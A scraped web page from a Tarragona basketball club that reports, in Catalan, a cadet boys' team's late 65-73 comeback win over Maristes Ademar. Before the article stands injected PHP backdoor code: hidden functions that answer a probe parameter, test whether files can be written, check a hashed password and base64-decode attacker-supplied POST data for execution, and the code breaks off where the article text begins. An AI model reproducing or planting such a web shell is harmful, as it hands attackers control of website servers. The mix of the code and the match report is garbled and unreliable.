function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet masculí 06A reviu a falta de dos minuts i s’emporta el triomf vers Maristes Ademar (65-73) - Tgn Bàsquet Club -

El Cadet masculí 06A reviu a falta de dos minuts i s’emporta el triomf vers Maristes Ademar (65-73)

Updated: maig 27, 2021

El Cadet masculí 06A aconsegueix refer-se als últims minuts per acabar guanyant a Maristes Ademar. El matx disputat dissabte va anar de menys a més pel que fa a l’ofensiva visitant, realitzant bones lectures i sabent trobar els avantatges. Tot i que en atac dominaven els liles gràcies a la seva superioritat física, en defensa va ser una desfeta. Els locals van trobar moltes escletxes en la defensa dels tarragonins, que van ser superats fàcilment en tots els 1c1, fent que tot l’equip hagués d’arribar a recuperar a l’ajuda, tard en vàries ocasions. Aquesta va ser la dinàmica durant la resta del partit fins que, quan faltaven dos minuts pel xiulet final, dos triples dels tarragonins donen oxigen extra per a acabar emportant-se la victòria.